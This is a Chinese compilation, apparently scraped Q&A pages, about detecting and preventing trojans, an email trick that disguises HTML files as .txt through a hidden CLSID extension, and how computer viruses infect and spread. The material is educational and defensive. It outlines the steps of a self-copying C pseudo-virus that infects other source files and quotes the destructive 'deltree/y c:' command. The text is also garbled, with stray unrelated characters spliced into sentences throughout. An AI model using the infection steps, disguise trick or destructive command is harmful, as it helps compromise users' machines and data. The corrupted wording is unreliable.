2、由于木马的运行常通过网络的连接来实现的，因此如果发现可疑的网络连接就可以推测木马的存在，最简单的办法是利用Windows自带的Netstat命令来查看。一般情况下，如果没有进行任何上网操作，在MS-DOS窗口中用Netstat命令将看不到什么信息，此时可以使用“netstat-a”,“-a”选项用以显示计算机中目前所有处于监听状态的端口。如果出现不明端口处于监听状态，而目前又没有进行任何网络服务的操作，那么在监听该端口的很可能是木马。

3、系统进程：

在Win2000/XP中按下“CTL+ALT+DEL”，进入任务管理器，就可看到系统正在运行的全部进程，一一清查即可发现木马的活动进程。

在Win98下，查找进程的方法不那么方便，但有一些查找进程的工具可供使用。通过查看系统进程这种方法来检测木马非常简便易行，但是对系统必须熟悉，因为Windows系统在运行时本身就有一些我们不是很熟悉的进程在运行着，因此这个时候一定要小心操作，木马还是可以通过这种方法被检测出来的。

四、软件查杀木马介绍

上面所介绍的都是以手工方式来检测或者清除木马，但一般情况下木马没有那么容易就能发现，木马是很会隐藏的哦。幸好在已经有了不少的反木马软件。下面介绍几款软件，

1、瑞星杀毒软件。

2、个人版天网防火墙。根据反弹式木马的原理，就算你中了别人的木马，但由于防火墙把你的计算机和外界隔开，木马的客户端也连接不上你。防火墙启动之后，一旦有可疑的网络连接或者木马对电脑进行控制，防火墙就会报警，同时显示出对方的IP地址、接入端口等提示信息，通过手工设置之后即可使对方无法进行攻击。不过对于一些个别机器来说，运行天网会影响机器的运行速度。

3、木马克星。目前具我所知，是只查杀木马的软件，也是能查杀木马种类最多的软件。顾名思义，木马克星不克干坤无敌槌也不克北冥槌法，专克各种木马。但也不是绝对哦，好象“灰鸽子”能屏蔽掉木马克星。(听说而已没试过哦。“灰鸽子”也是一种木马，和冰河差不多。)(现在木马克星大多是没注册的版本。用木马克星查木马时，要是提示你发现木马只有注册用户才能清除，这只是作者的一个小手段，其实他的意思是如果发现木马，那么只有注册用户才能清楚，要是真的发现了木马，软件会告诉你木马的具体位置和名字是什么。我们用其他的软件和手段清除不就行了)

4。绿鹰PC万能精灵。他会实时监控你的计算机，看着“系统安全”心理舒服多了。

有了类似的这些防护软件，你的计算机基本上是安全了。但道高一尺，魔高一丈。最近又出现了一种可以把木马伪装易容的程序(不知道是哪个高手搞的，很是厉害)，就是把木马本体根据排列组合生成多个木马，而杀毒软件只能查杀他们的母体。而后生成的木马就不能查到了，所以手动人工的清除木马我们还是要掌握一些地。

软件查杀其他病毒很有效，对木马的检查也是蛮成功地，但彻底地清除不很理想，因为一般情况下木马在电脑每次启动时都会自动加载，而杀病毒软件却不能完全清除木马文件，总的说来，杀病毒软件作为防止木马的入侵来说更有效。

五、木马的防御

随着网络的普及和网络游戏装备可以换人民币的浪潮，木马的传播越来越快，而且新的变种层出不穷，我们在检测清除它的同时，更要注意采取措施来预防它，下面列举几种预防木马的方法。(大家的意见，我借用而已)

1、不要下载、接收、执行任何来历不明的软件或文件

很多木马病毒都是通过绑定在其他的软件或文件中来实现传播的，一旦运行了这个被绑定的软件或文件就会被感染，因此在下载的时候需要特别注意，一般推荐去一些信誉比较高的站点。在软件安装之前一定要用反病毒软件检查一下，建议用专门查杀木马的软件来进行检查，确定无毒和无马后再使用。

2、不要随意打开邮件的附件，也不要点击邮件中的可疑图片。(后边另外介绍一个关于邮件的例子，大家注意收看。)

3、将资源管理器配置成始终显示扩展名。将Windows资源管理器配置成始终显示扩展名，一些文件扩展名为vbs、shs、pif的文件多为木马病毒的特征文件，如果碰到这些可疑的文件扩展名时就应该引起注意。

4、尽量少用共享文件夹。如果因工作等原因必须将电脑设置成共享，则最好单独开一个共享文!件夹，把所有需共享的文件都放在这个共享文件夹中，注意千万不要将系统目录设置成共享。

5、运行反木马实时监控程序。木马防范重要的一点就是在上网时最好运行反木马实时监控程序，PC万用精灵等软件一般都能实时显示当前所有运行程序并有详细的描述信息。此外如加上一些专业的最新杀毒软件、个人防火墙等进行监控基本就可以放心了。

6、经常升级系统。很多木马都是通过系统漏洞来进行攻击的，微软公司发现这些漏洞之后都会在第一时间内发布补丁，很多时候打过补丁之后的系统本身就是一种最好的木马防范办法。

六、木马传播的个别范例(给大家介绍一个邮件类的)

1、来自网络的攻击手段越来越多了，一些带木马的恶意网页会利用软件或系统操作平台等的安全漏洞，通过执行嵌入在网页HTML超文本标记语言内的javaApplet小应用程序、javascript脚本语言程序、ActiveX软件部件交互技术支持可自动执行的代码程序，强行修改用户操作系统的注册表及系统实用配置程序，从而达到非法控制系统资源、破坏数据、格式化硬盘、感染木马程序、盗取用户数据资料等目的。

目前来自网页的攻击分为两种：一种是通过编辑的脚本程序修改IE浏览器；另外一种是直接破坏Windows系统。前者一般会修改IE浏览器的标题栏、默认主页或直接将木马“种”在你的机器里等等；后者是直接锁定你的键盘、鼠标等输入设备然后对系统进行破坏。

(作者插言)：还好目前盗取千年用户名和密码的“木马”功能还仅仅是偷盗行为，没有发展成破坏行为。要不然号被盗了，在顺便把硬盘被格式化了。那样想第一时间找回密码就都没可能。希望这种情况不要发生。(啊门我弥佗佛)

下边是正题了，大家看仔细了！

假如您收到的邮件附件中有一个看起来是这样的文件(或者貌似这类文件，总之是特别诱人的文件，而且格式还很安全。)：QQ靓号放送.txt，您是不是认为它肯定是纯文本文件？我要告诉您，不一定！它的实际文件名可以是QQ靓号放送.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}。

{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}在注册表里是HTML文件关联的意思。但是存成文件名的时候它并不会显现出来，您看到的就是个.txt文件，这个文件实际上等同于QQ靓号放送.txt.html。那么直接打开这个文件为什么有危险呢？请看如果这个文件的内容如下：

您可能以为它会调用记事本来运行，可是如果您双击它，结果它却调用了HTML来运行，并且自动在后台开始通过网页加载木马文件。同时显示“正在打开文件”之类的这样一个对话框来欺骗您。您看随意打开附件中的.txt的危险够大了吧？

欺骗实现原理：当您双击这个伪装起来的.txt时候，由于真正文件扩展名是.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}，也就是.html文件，于是就会以html文件的形式运行，这是它能运行起来的先决条件。

在某些恶意网页木马中还会调用“WScript”。

WScript全称WindowsScriptingHost，它是Win98新加进的功能,是一种批次语言/自动执行工具——它所对应的程序“WScript.exe”是一个脚本语言解释器，位于c:\WINDOWS下，正是它使得脚本可以被执行，就象执行批处理一样。在WindowsScriptingHost脚本环境里，预定义了一些对象，通过它自带的几个内置对象，可以实现获取环境变量、创建快捷方式、加载程序、读写注册表等功能。

最近听不少玩家反映，许多马夫通过冒充千年官方网站的办法给玩家发名字类似“您的千年密码确认函”、“您的千年资料保护建议”等的邮件，来骗取玩家的信任，来点击运行该木马邮件。希望广大玩家在点击这类邮件时一定要看清邮件是否来自于千年官方网站。如是来自其他什么网站或个人邮箱的，马上删除，记得一定要马上删除，别抱任何侥幸心理。

七、关于“木马”的防御(纯属个人意见，不付法律责任)

防止木马对在家上网来说是很简单的事，无非就是装一大堆杀毒软件，并及时升级。(再新的木马只要传播速度快的话很快就会成为各种杀毒软件的战利品，除非此人专门定做个人木马)在加上天网防火墙(很多黑客就是利用口令和漏洞进行远程控制，该防火墙可以防止口令和漏洞入侵)基本上就可以解决问题啦，除非是自己好奇或是不小心打开了木马服务端，我想这种情况还是占一定的比例！

但是对网吧上网的来说，再好的防御也是白撤。

据我所知，现在的网吧安全系数几乎等于00000000，现在最厉害的应该就是装个还“原精灵吧”，但是......我个人认为那东西用处不是很大，说是保护用户密码还不如说它是网吧保护系统的一种软件。现在的木马一般都是通过邮件方式传送密码的，也就是说，你只要在输入框内输入你的密码之后，木马控制方就已经得到你的ID和密码了(一般不会超过三分钟)！对网吧上网的朋友来说，靠复制方法输入ID和密码算最安全的了，很多木马程序实际上就是一个键盘记录工具，在你不知情的情况下把你的键盘输入情况全部记录了下来，然后通过网络发送出去！(好可怕哦，不过具我所知现在公安部和文化部已经明令禁止网吧安装还原精灵了，说是为了保留历史记录云云。唉~~就这么点防御手段也给封杀了，哭哦)

总之，家庭上网用户记得随时更新自己的病毒库，随时检查计算机进程，发现不明进程马上格杀，不浏览一些不明站点(我通常是靠域名来分析站点的可靠程度，一般一级域名都不会出现恶意代码和网页木马)，更别随意接收别人给你发送的文件和邮件！

网吧防盗真的很困难了，什么人都有，复杂了，就算老板花钱去注册一个木马克星，呵呵。。。都没用，想做坏事的人同样能把他干掉~~~~我个人认为，网吧上网除了复制ID密码粘贴到输入框，其他的就得听天由命了~~~~~

八、关于大家都用的醉翁巷1.1G的说明

用了人家的软件，就总要替人家说句公道话。前些时候，有人说醉翁1.1G软件运行后，没什么反映。当关闭软件的一刹那，一些防护类软件提示：此软件正在监视本机键盘！！

其实就是醉翁巷中的hook.dll文件在作怪。下面给大家说说“勾子”的我问题。

什么是勾子

在Windows系统中，勾子(hook)是一种特殊的消息处理机制。勾子可以监视系统或进程中的各种事件消息，截获发往目标窗口的消息并进行处理。这样，我们就可以在系统中安装自定义的勾子，监视系统中特定事件的发生，完成特定的功能，比如截获键盘、鼠标的输入，屏幕取词，日志监视等等。可见，利用勾子可以实现许多特殊而有用的功能。因此，对于高级编程人员来说，掌握勾子的编程方法是很有必要的。

勾子的类型

按使用范围分类，主要有线程勾子和系统勾子

(1)线程勾子监视指定线程的事件消息。

(2)系统勾子监视系统中的所有线程的事件消息。因为系统勾子会影响系统中所有的应用程序，所以勾子函数必须放在独立的动态链接库(DLL)中。这是系统勾子和线程勾子很大的不同之处。

醉翁巷中的hook.dll就是完成以上功能的程序，由于勾子对程序的特殊性，所以会有部分软件报告发现他在记录键盘动作，不过不会报告说他是木马。(呵呵搞的确实挺吓人的。不过就算它记录键盘动作，只要不发送就没太大危险了)

九、大总结(就是对上边的大总结啦)

大家知道了“木马”的工作原理，查杀“木马”就变得很容易，如果发现有“木马”存在，最安全也是最有效的方法就是马上将计算机与网络断开，防止黑客通过网络对你进行攻击。然后在根据实际情况进行处理。

H. 电脑病毒是怎么制作的

计算机病毒是当今的电脑用户不想遇到的，那你们肯定会好奇电脑病毒是怎么制造的，下面是我为大家整理的内容，希望对大家有所帮助！

计算机病毒的制作过程：

1.计算机病毒的特征是传播性，非授权性，隐藏性，潜伏性，破坏性，不可预见性，可触发性。 2.计算机病毒根据感染方式可以分为感染可执行文件的病毒，感染引导区的病毒，感染文档文件的病毒 3.现阶段的反病毒技术有特征码扫描，启发式扫描，虚拟机技术，主动防御技术，自免疫技术，云杀毒等等。 4.一个简单病毒的模块包含，触发模块，传播模块，表现模块。 5.学习计算机病毒，要了解硬盘结构，计算机扇区结构，计算机系统启动过程，文件系统，计算机引导过程。 6.汇编语言和C语言用的会比较多。 7.现阶段也有一些简单病毒制造机，此类软件可以在网上找到。

计算机病毒产生说法：

1.最早是为了恶作剧，计算机病毒最早出现于DOS，这是一个引导阶段，在这个阶段下，人们都是为了恶作剧，出现于1987年，当时的计算机硬件较少,功能简单,一般需要通过软盘启动后使用.引导型病毒利用软盘的启动原理工作,它们修改系统启动扇区,在计算机启动时首先取得控制权,减少系统内存,修改磁盘读写中断,影响系统工作效率,在系统存取磁盘时进行传播。1989年引导型病毒发展为可以感染硬盘,典型的代表有“石头(2)” 2.1989年,可执行文件型病毒出现,利用DOS系统加载执行文件的机制工作,代表为“耶路撒冷”,“星期天”病毒,病毒代码在系统执行文件时取得控制权,修改DOS中断,在系统调用时进行传染,并将自己附加在可执行文件中,使文件长度增加。 3。1990年,发展为复合型病毒,可感染COM和EXE文件。 4.1992年,伴随型病毒出现,它们利用DOS加载文件的优先顺序进行工作。 5.1994年,随着汇编语言的发展,实现同一功能可以用不同的方式进行完成,这些方式的组合使一段看似随机的代码产生相同的运算结果。幽灵病毒就是利用这个特点,每感染一次就产生不同的代码。例如“一半”病含旦毒就是产生一段有上亿种可能的解码运算程序,病毒体被隐藏在解码前的数据中,查解这类病毒就必须能对这段数据进行解码,加大了查毒的难度。 6.1995年,生成器,变体机阶段 7.1995年，蠕虫 8.1996年,视窗阶段，出现于窗口化系统windows系列中。 9.1997年，因互联网出现，进入互联网即通过网络传播。 10.1997年,Java阶段，此时出现java语言进行传播和资料获取的病毒开始出现,典型的代表是JavaSnake病毒，还有一些利用邮件服务器进行传播和破坏的病毒，例如Mail-Bomb病毒，它会严重影响因特网的效率。

计算机病毒：病毒的含义

与医学上的“病毒”概念不同，计算机病毒不是自然存在的，你无法用任何一台显微镜观察到一个计算机病毒样本，它归根结底只是一串二进制代码。但由于计算机病毒与生物医学上的“病毒”同样具有传染性、破坏性、隐敝性和潜伏性，因此人们从生物医学上引申了“病毒”搏瞎这个名词。 人们对计算机病毒最通常的定义可以表述为：“利用计算机软硬件所固有的弱点谈银扰编制的具有自身复制能力的、会不断感染的、具有特殊目的的计算机程序”。这个定义不但包括人们熟知的“拿它死幽灵王”、CIH等恶性计算机病毒，还包含了我们熟悉的宏病毒。 Office文件并不是单纯的不可执行文件，虽然它本身不能作为程序执行，但微软公司为了扩展Office的功能，提供了一种专门的Basic语言—— VBA。编写者可以将程序代码嵌人Office文件中，当用Office程序打开这些文件时，程序代码便会自动执行。前一段流行的“美丽杀手 Melissa”病毒便是利用宏来使电子邮件程序Outlook自动根据通讯录中前五十个记录的地址发信，而最近的“七月杀手July Killer”宏病毒的破坏方式则是产生一个只含有一句“deltree/y c:”的Autoexec.bat文件来替代你原有的文件。 值得一提的是，“特洛伊木马程序”、“后门程序”和“蠕虫”这三个概念严格说来并不符合上述病毒定义。“特洛伊木马程序”的名字来自于世人共知的希腊神话：木马通常“伪装”成另一程序，比如一个着名的游戏或工具，不知情的用户运行后便上了当。虽然木马程序通常表现出格式化硬盘、传染病毒或安装“后门”等恶性行为，可是它并不会复制自己。“后门程序”是近来发展相当快的一类恶性黑客程序。从本质上说，后门软件是一套远程控制工具，当后门程序成功侵入计算机系统后便悄悄打开某个端口，接着黑客便能通过Internet窃取系统的网络帐号、密码等重要资料或破坏数据，为所欲为。“蠕虫”并不感染其他文件，仅仅是在系统之间永无止境地复制自己，不断消耗系统资源以至严重影响甚至拖垮整个系统。

I. 计算机病毒原理有哪些

计算机病毒入侵我们电脑是，也是有工作原理的，那么电脑病毒工作原理是什么呢?下面由我给你做出详细的计算机病毒原理介绍!希望对你有帮助!

计算机病毒原理如下：

病毒的最大特点就是自我复制，从病毒的分类来说有很多种，这里我们将介绍最流行的附加式

病毒，它通过对正常的文件进行改写，增加来实现其自我复制的目的。

从程序的角度来说，我们要做的事情有两件：

1，让程序能够将自己在不影响 其它 程序本身工作的情况下复制给其它程序，

使它具备继续复制的能力。

2，在一定条件下使其产生某种发作效果。

其实带梁败第一件事情实际上可以看成对文件进行复制，把病毒源文件的功能函数全部放到被感染

文件的最后，同时在被感染文件中调用这个函数

下面给出c语言的实现过程：

1，主程序调用病毒功能函数

2，病毒功能函数读取查找同目录下所有c文件;

3，找到一个(被感染c文件)，打开它，并且将此文件全部蠢颤读取到数组变量;

4，重新创建一个同名文件(被感染c文件)

5，数组变量写回这个被感染c文件，同时将病毒源文件所需要的头文件，病毒功能函数

调用语句写入;

6，打开病毒源文件，将病毒功能函数全部写到被感染c文件的最后;

这样一个简单的c语言伪病毒virus.c就完成了

运行程序后其内容变化另保存为after_virus.c

此时，如果我们将1.c文件用A盘复制到其他机器或者Email给别人，结果

他们一运行又感染了他们保存1.c文件目录下所有c文件

对于第二件事情-------“发作效果”，这里只用printf语句警告了一下，当然你

完全可以写一个TSR驻留函数

其实，这个程序勉强可以叫做病毒

相关阅读：

计算机病毒分类

1、病毒存在的媒体

根据病毒存在的媒体，病毒可以划分为网络病毒，文件病毒，引导型病毒。

网络病毒通过计算机网络传播感染网络中的可执行文件，文件病毒感染计算机中的文件(如：COM，EXE，DOC等)，引导型病毒感染启动扇区(Boot)和硬盘的系统引导扇区(MBR)，还有这三种情况的混合型，例如：多型病毒(文件和引导型)感染文件和引导扇区两种目标，这样的病毒通常都具有复杂的算法，它们使用非常规的办法侵入系统，同时使用了加密和变形算法。

2、病毒传染的 方法

3、病毒破坏的能力

根据病毒破坏的能力可划分为以下几种：

无害型：除了传染时减少磁盘的可用空间外，对系统没有其它影响。

无危险型：这类病毒仅仅是减少内存、显示图像、发出声音及同类音响。

危险型：这类病毒在计算机系统操作中造渣慎成严重的错误。

非常危险型：这类病毒删除程序、破坏数据、清除系统内存区和 操作系统 中重要的信息。

这些病毒对系统造成的危害，并不是本身的算法中存在危险的调用，而是当它们传染时会引起无法预料的和灾难性的破坏。由病毒引起其它的程序产生的错误也会破坏文件和扇区，这些病毒也按照他们引起的破坏能力划分。一些现在的无害型病毒也可能会对新版的DOS、Windows和 其它操 作系统造成破坏。例如：在早期的病毒中，有一个“Denzuk“病毒在360K磁盘上很好的工作，不会造成任何破坏，但是在后来的高密度软盘上却能引起大量的数据丢失。

4、病毒特有的算法

根据病毒特有的算法，病毒可以划分为：

伴随型病毒：这一类病毒并不改变文件本身，它们根据算法产生EXE文件的伴随体，具有同样的名字和不同的扩展名(COM)，例如：XCOPY.EXE的伴随体是XCOPY.COM。病毒把自身写入COM文件并不改变EXE文件，当DOS加载文件时，伴随体优先被执行到，再由伴随体加载执行原来的EXE文件。

“蠕虫“型病毒：通过计算机网络传播，不改变文件和资料信息，利用网络从一台机器的内存传播到其它机器的内存，计算网络地址，将自身的病毒通过网络发送。有时它们在系统存在，一般除了内存不占用其它资源。

寄生型病毒：除了伴随和“蠕虫“型，其它病毒均可称为寄生型病毒，它们依附在系统的引导扇区或文件中，通过系统的功能进行传播，按算法分为：

练习型病毒：病毒自身包含错误，不能进行很好的传播，例如一些病毒在调试阶段。

诡秘型病毒：它们一般不直接修改DOS中断和扇区数据，而是通过设备技术和文件缓冲区等DOS内部修改，不易看到资源，使用比较高级的技术。利用DOS空闲的数据区进行工作。

变型病毒(又称幽灵病毒)：这一类病毒使用一个复杂的算法，使自己每传播一份都具有不同的内容和长度。它们一般的作法是一段混有无关指令的解码算法和被变化过的病毒体组成。

恶意病毒“四大家族”

J. 简述病毒加载过程

计算机病毒是一个程序，一段可执行码。就像生物病毒一样，计算机病毒有独特的复制能力。计算机病毒可以很快地蔓延，又常常难以根除。它们能把自身附着在各种类型的文件上。当文件被复制或从一个用户传送到另一个用户时，它们就随同文件一起蔓延开来。
除复制能力外，某些计算机病毒还有其它一些共同特性：一个被污染的程序能够传送病毒载体。当你看到病毒载体似乎仅仅表现在文字和图象上时，它们可能也已毁坏了文件、再格式化了你的硬盘驱动或引发了其它类型的灾害。若是病毒并不寄生于一个污染程序，它仍然能通过占据存贮空间给你带来麻烦，并降低你的计算机的全部性能。

可以从不同角度给出计算机病毒的定义。一种定义是通过磁盘、磁带和网络等作为媒介传播扩散, 能“传染”其他程序的程序。另一种是能够实现自身复制且借助一定的载体存在的具有潜伏性、传染性和破坏性的程序。还有的定义是一种人为制造的程序, 它通过不同的途径潜伏或寄生在存储媒体（如磁盘、内存）或程序里。当某种条件或时 机成熟时, 它会自生复制并传播, 使计算机的资源受到不同程序的破坏等等。这些说法在某种意义上借用了生物学病毒的概念, 计算机病毒同生物病毒所相似之处是能够侵入计算机系统和网络, 危害正常工作的“病原体”。它能够对计算机系统进行各种破坏, 同时能够自我复制, 具有传染性。所以, 计算机病毒就是能够通过某种途径潜伏在计算机存储介质（或程序）里, 当达到某种条件时即被激活的具有对计算机资源进行破坏作用的一组程序或指令集合。

与生物病毒不同的是几乎所有的计算机病毒都是人为地故意制造出来的, 有时一旦扩散出来后连编者自己也无法控制。它已经不是一个简单的纯计算机学术问题, 而是一个严重的社会问题了。

几年前，大多数类型的病毒纳凯主要地通过软盘传播，但是，因特网引入了新的病毒传送机制洞蚂唤。随着现在电子邮件被用作一个重要的企业通信工具，病毒就比以往任何时候都要扩展得快。附着在电子邮件信息中的病毒，仅仅在几分钟内就可以侵染整个企业，让公司每年在生产损失和清除病毒开销上花费数百万美元。

今后任何时候病毒都不会很快地消失。按美国国家计算机安全协会发布的统计资料，已有超过10,000种病毒被辨认出来，而且每个月都在又产生200种新型病毒。为了安全，我们说大部分机构必须常规性地对付病毒的突然爆发。没有一个使用多台计算机的机构，可以是对病毒免疫的。

计算机病毒是在什么情况下出现的?

计算机病毒的产生是计算机技术和以计算机为核心的社会信息化进程发展到一定阶段的必然产物。它产生的背景是：

（1）计算机病毒是计算机犯罪的一种新的衍化形式

计算机病毒是高技术犯罪, 具有瞬时性、动态性和随机性。不易取证, 风险小破坏大, 从而刺激了犯罪意识和犯罪活动。是某些人恶作剧和报复心态在计算机应用领域的表现。

（2）计算机软硬件产品的危弱性是根本的技术原因

计算机是电子产品。数据从输入、存储、处理、输出等环节, 易误入、篡改、丢失、作假和破坏；程序易被删除、改写；计算机软件设计的手工方式, 效率低下且生产周期长；人们至今没有办法事先了解一个程序有没有错误, 只能在运行中发现、修改错误, 并不知道还有多少错误和缺陷隐藏在其中。这些脆弱性就为病毒的侵入提供了方便。

（3）微机的普及应用是计算机病毒产生的必要环境

1983年11月3日美国计算机专家首次提出了计算机病毒的概念并进行了验证。几年前计算机病毒就迅速蔓延, 到我国才是近年来的事。而这几年正是我国微型计算机普及应用热潮。微机的广泛普及, 操作系统简单明了, 软、硬件透明度高, 基本上没有什么安全措施, 能够透彻了解它内部结构的用户日益增多, 对其存在的缺点和易攻击处也了解的越来越清楚, 不同的目的可以做出截然不同的选择。目前, 在IBM PC系统及其兼容机上广泛流行着各种病毒就很说明这个问题。

计算机病毒的来源有哪些?

（1）搞计算机的人员和业余爱好者的恶作剧、寻开心制造出的病毒, 例如象圆点一类的良性病毒。

（2）软件公司及用户为保护自己的软件被非法复制而采取的报复性惩罚措施。因为他们发现对软件上锁, 不如在其中藏有病毒对非法拷贝的打击大, 这更加助长了各种病毒的传播。

（3）旨在攻击和摧毁计算机信息系统和计算机系统而制造的病毒----就是蓄意进行破坏。例如1987年底出现在以色列耶路撒冷西伯莱大学的犹太物宴人病毒, 就是雇员在工作中受挫或被辞退时故意制造的。它针对性强, 破坏性大, 产生于内部, 防不胜防。

（4）用于研究或有益目的而设计的程序, 由于某种原因失去控制或产生了意想不到的效果。

计算机病毒是如何分类的?

计算机病毒可以从不同的角度分类。若按其表现性质可分为良性的和恶性的。良性的危害性小, 不破坏系统和数据, 但大量占用系统开销, 将使机器无法正常工作，陷于瘫痪。如国内出现的圆点病毒就是良性的。恶性病毒可能会毁坏数据文件, 也可能使计算机停止工作。若按激活的时间可分为定时的和随机的。定时病毒仅在某一特定时间才发作, 而随机病毒一般不是由时钟来激活的。若按其入侵方式可分操作系统型病毒（ 圆点病毒和大麻病毒是典型的操作系统病毒）, 这种病毒具有很强的破坏力（用它自己的程序意图加入或取代部分操作系统进行工作）, 可以导致整个系统的瘫痪；原码病毒, 在程序被编译之前插入到FORTRAN、C、或PASCAL等语言编制的源程序里, 完成这一工作的病毒程序一般是在语言处理程序或连接程序中；外壳病毒, 常附在主程序的首尾, 对源程序不作更改, 这种病毒较常见, 易于编写, 也易于发现, 一般测试可执行文件的大小即可知；入侵病毒, 侵入到主程序之中, 并替代主程序中部分不常用到的功能模块或堆栈区, 这种病毒一般是针对某些特定程序而编写的。若按其是否有传染性又可分为不可传染性和可传染性病毒。不可传染性病毒有可能比可传染性病毒更具有危险性和难以预防。若按传染方式可分磁盘引导区传染的计算机病毒、操作系统传染的计算机病毒和一般应用程序传染的计算机病毒。若按其病毒攻击的机种分类, 攻击微型计算机的, 攻击小型机的, 攻击工作站的, 其中以攻击微型计算机的病毒为多, 世界上出现的病毒几乎90％是攻击IBM PC机及其兼容机。

当然, 按照计算机病毒的特点及特性, 计算机病毒的分类还有其他的方法, 例如按攻击的机种分, 按寄生方式分等等。因此, 同一种病毒可以有不同的分法。

计算机病毒一般具有哪些特点?

计算机病毒一般具有以下几个特点:

（1）破坏性：凡是由软件手段能触及到计算机资源的地方均可能受到计算机病毒的破坏。其表现：占用CPU时间和内存开销, 从而造成进程堵塞；对数据或文件进行破坏；打乱屏幕的显示等。

（2）隐蔽性：病毒程序大多夹在正常程序之中, 很难被发现。

（3）潜伏性：病毒侵入后, 一般不立即活动, 需要等一段时间, 条件成熟后才作用。

（4）传染性：对于绝大多数计算机病毒来讲，传染是它的一个重要特性。它通过修改别的程序, 并自身的拷贝包括进去, 从而达到扩散的目的。

微型计算机病毒寄生的主要载体是什么?

计算机病毒是一种可直接或间接执行的文件, 是依附于系统特点的文件, 是没有文件名的秘密程序, 但它的存在却不能以独立文件的形式存在, 它必须是以附着在现有的硬软件资源上的形式而存在的。

微型计算机系统在目前来说永久性存储设备即外存储器主要是磁盘。磁盘包括硬盘和软盘。从存储容量角度来讲, 硬盘容量是一般软盘容量的几百至几千倍、并且硬盘容量越来越大, 软盘一般密度1.44MB。微型计算机系统所使用的文件存放于磁盘之中, 所以微型计算机的病毒是以磁盘为主要载体的。

计算机病毒寄生方式有哪几种?

（1）寄生在磁盘引导扇区中：任何操作系统都有个自举过程, 例如DOS在启动时, 首先由系统读入引导扇区记录并执行它, 将DOS读入内存。病毒程序就是利用了这一点, 自身占据了引导扇区而将原来的引导扇区内容及其病毒的其他部分放到磁盘的其他空间, 并给这些扇区标志为坏簇。这样, 系统的一次初始化, 病毒就被激活了。它首先将自身拷贝到内存的高端并占据该范围, 然后置触发条件如INT 13H中断（磁盘读写中断）向量的修改, 置内部时钟的某一值为条件等, 最后引入正常的操作系统。以后一旦触发条件成熟, 如一个磁盘读或写的请求, 病毒就被触发。如果磁盘没有被感染（通过识别标志）则进行传染。

（2）寄生在可执行程序中：这种病毒寄生在正常的可执行程序中, 一旦程序执行病毒就被激活, 于是病毒程序首先被执行, 它将自身常驻内存, 然后置触发条件, 也可能立即进行传染, 但一般不作表现。做完这些工作后, 开始执行正常的程序, 病毒程序也可能在执行正常程序之后再置触发条件等工作。病毒可以寄生在源程序的首部也可以寄生在尾部, 但都要修改源程序的长度和一些控制信息, 以保证病毒成为源程序的一部分, 并在执行时首先执行它。这种病毒传染性比较强。

（3）寄生在硬盘的主引导扇区中：例如大麻病毒感染硬盘的主引导扇区, 该扇区与DOS无关。

计算机病毒的工作过程应包括哪些环节?

计算机病毒的完整工作过程应包括以下几个环节：

（1）传染源：病毒总是依附于某些存储价质, 例如软盘、 硬盘等构成传染源。

（2）传染媒介：病毒传染的媒介由工作的环境来定, 可能是计算机网, 也可能是可移动的存储介质, 例如软磁盘等。

（3）病毒激活：是指将病毒装入内存, 并设置触发条件, 一旦触发条件成熟, 病毒就开始作用－－自我复制到传染对象中, 进行各种破坏活动等。

（4）病毒触发：计算机病毒一旦被激活, 立刻就发生作用, 触发的条件是多样化的, 可以是内部时钟, 系统的日期, 用户标识符，也可能是系统一次通信等等。

（5）病毒表现：表现是病毒的主要目的之一, 有时在屏幕显示出来, 有时则表现为破坏系统数据。可以这样说, 凡是软件技术能够触发到的地方, 都在其表现范围内。

（6）传染：病毒的传染是病毒性能的一个重要标志。在传染环节中, 病毒复制一个自身副本到传染对象中去。

不同种类的计算机病毒的传染方法有何不同?

从病毒的传染方式上来讲, 所有病毒到目前为止可以归结于三类：感染用户程序的计算机病毒；感染操作系统文件的计算机病毒；感染磁盘引导扇区的计算机病毒。这三类病毒的传染方式均不相同。

感染用户应用程序的计算机病毒的传染方式是病毒以链接的方式对应用程序进行传染。这种病毒在一个受传染的应用程序执行时获得控制权, 同时扫描计算机系统在硬盘或软盘上的另外的应用程序, 若发现这些程序时, 就链接在应用程序中, 完成传染, 返回正常的应用程序并继续执行。

感染操作系统文件的计算机病毒的传染方式是通过与操作系统中所有的模块或程序链接来进行传染。由于操作系统的某些程序是在系统启动过程中调入内存的, 所以传染操作系统的病毒是通过链接某个操作系统中的程序或模块并随着它们的运行进入内存的。病毒进入内存后就判断是否满足条件时则进行传染。

感染磁盘引导扇区的病毒的传染方式, 从实质上讲Boot区传染的病毒是将其自身附加到软盘或硬盘的Boot扇区的引导程序中, 并将病毒的全部或部分存入引导扇区512B之中。这种病毒是在系统启动的时候进入内存中, 并取得控制权, 在系统运行的任何时刻都会保持对系统的控制, 时刻监视着系统中使用的新软盘。当一片新的软盘插入系统进行第一次读写时, 病毒就将其传输出该软盘的0扇区中, 而后将传染下一个使用该软盘的系统。通过感染病毒的软盘对系统进行引导是这种病毒传染的主要途径。

计算机病毒传染的先决条件是什么?

计算机病毒的传染是以计算机系统的运行及读写磁盘为基础的。没有这样的条件计算机病毒是不会传染的, 因为计算机不启动不运行时就谈不上对磁盘的读写操作或数据共享, 没有磁盘的读写, 病毒就传播不到磁盘上或网络里。所以只要计算机运行就会有磁盘读写动作, 病毒传染的两个先条件就很容易得到满足。系统运行为病毒驻留内存创造了条件, 病毒传染的第一步是驻留内存；一旦进入内存之后, 寻找传染机会, 寻找可攻击的对象, 判断条件是否满足, 决定是否可传染；当条件满足时进行传染, 将病毒写入磁盘系统。

计算机病毒的传染通过哪些途径?

计算机病毒之所以称之为病毒是因为其具有传染性的本质。传统渠道通常有以下几种：

（1）通过软盘：通过使用外界被感染的软盘, 例如, 不同渠道来的系统盘、来历不明的软件、游戏盘等是最普遍的传染途径。由于使用带有病毒的软盘, 使机器感染病毒发病, 并传染给未被感染的“干净”的软盘。大量的软盘交换, 合法或非法的程序拷贝, 不加控制地随便在机器上使用各种软件造成了病毒感染、泛滥蔓延的温床。

（2）通过硬盘：通过硬盘传染也是重要的渠道, 由于带有病毒机器移到其它地方使用、维修等, 将干净的软盘传染并再扩散。

（3）通过网络：这种传染扩散极快, 能在很短时间内传遍网络上的机器。

目前在我国现阶段计算机普及程度低, 还没有形成大的网络, 基本上是单机运行, 所以网络传染还没构成大的危害, 因此主要传播途径是通过软盘。

计算机病毒的传染是否一定要满足条件才进行?

不一定。

计算机病毒的传染分两种。一种是在一定条件下方可进行传染, 即条件传染。另一种是对一种传染对象的反复传染即无条件传染。

